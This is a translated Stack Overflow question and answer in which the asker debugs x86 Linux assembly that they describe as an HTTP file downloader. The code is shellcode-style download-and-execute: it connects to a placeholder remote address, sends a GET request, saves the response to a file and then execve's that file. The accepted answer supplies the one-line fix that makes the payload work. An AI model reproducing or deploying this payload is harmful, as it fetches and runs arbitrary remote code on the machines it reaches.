几个小时以来,我一直在努力让这个汇编代码发挥作用。我已经搜索了所有可能找到的文章。
.section .text
.global _start
_start:
push $0x66
popl %eax
cdq
pushl $0x1
popl %ebx
pushl %edx
pushl %ebx
pushl $0x2
movl %esp, %ecx
int $0x80
popl %ebx
popl %esi
pushl $0xdeadbeef # replace with inet_addr() result
movl $0xaffffffd, %ebp # ~(0080|AF_INET)
not %ebp
pushl %ebp
incl %ebx
pushl $0x10
pushl %ecx
pushl %eax
movb $0x66, %al
movl %esp, %ecx
int $0x80
popl %edi
_open_file:
movb $0x8, %al
pushl %edx
pushl $0x41
movl %esp, %ebx
pushl %eax
popl %ecx
int $0x80
xchg %eax, %esi
xchg %ebx, %edi
_gen_http_request:
#
# < use gen_httpreq.c, to generate a HTTP GET request. >
#
_gen_http_eof:
movb $0x4, %al
_send_http_request:
movl %esp, %ecx
int $0x80
cdq
incl %edx
_wait_for_dbl_crlf:
decl %ecx
movb $0x3, %al
int $0x80
cmpl $0x0d0a0d0a, (%ecx)
jne _wait_for_dbl_crlf
_pre_dump_loop:
movb $0x4, %dl
_dump_loop_do_read:
movb $0x3, %al
clc
_dump_loop_do_write:
int $0x80
xchg %ebx, %esi
jc _dump_loop_do_read
test %eax, %eax
jz _close_file
movb $0x4, %al
stc
jmp _dump_loop_do_write
_close_file:
movb $0x6, %al
int $0x80
_execve_file:
cdq
movb $0xb, %al
movl %edi, %ebx
pushl %edx
pushl %ebx
jmp _send_http_request
我使用 gen_httpreq.c
生成发送到服务器的 HTTP 请求。
我的问题似乎是从未建立套接字。我观察了 netstat 输出,当我执行上面的代码时,我根本没有得到任何连接。我很好奇是否有特定的方法可以做到这一点。
此外,我尝试在另一个 shell 中运行 netcat 并监听端口 80,只是为了查看 netstat 是否没有获取连接,但没有任何结果。
这是我的 HTTP 请求。
pushl $0x0d0a0d0a
pushl $0x2f312e30
pushl $0x48545450
pushl $0x696c6520
pushl $0x2f2f2f66
pushl $0x47455420
当我在 strace
下执行它时,我得到:
execve("./ht", ["./ht"], [/* 19 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(8081), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
write(3, "", 0) = 0
read(3, 0xffc59c8c, 1) = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
它只是挂起,似乎什么都不做。
如果有另一种方法可以像这样下载文件,例如,发送 HTTP 请求,然后读取该请求的输出。
所以基本上我会这样做:
./download > newfile
我找不到关于这个主题的任何其他内容,因为它非常简单。 感谢您的帮助!
最佳答案
我已经弄清楚问题出在哪里了。当您使用该程序生成 HTTP 请求时,它会返回所有 pushl,但最后不会返回必要的 movb。
我添加了 movb $0x14,%dl 并且效果很好
关于linux - 发送 HTTP 请求并接收输出。 x86 Linux 汇编,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/37643618/